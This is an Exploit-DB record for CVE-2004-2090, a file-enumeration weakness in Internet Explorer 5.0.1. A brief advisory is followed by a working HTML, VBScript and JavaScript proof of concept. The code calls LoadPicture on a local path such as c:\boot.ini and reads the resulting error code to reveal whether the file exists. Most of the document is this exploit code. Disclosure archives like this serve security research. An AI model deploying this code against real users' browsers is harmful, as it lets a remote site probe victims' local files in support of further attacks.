Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness

2004-02-07T00:00:00
ID EDB-ID:23668
Type exploitdb
Reporter Jelmer
Modified 2004-02-07T00:00:00

Description

Microsoft Internet Explorer 5.0.1 LoadPicture File Enumeration Weakness. CVE-2004-2090. Remote exploit for windows platform

                                        
                                            source: http://www.securityfocus.com/bid/9611/info

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. 

This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:\boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>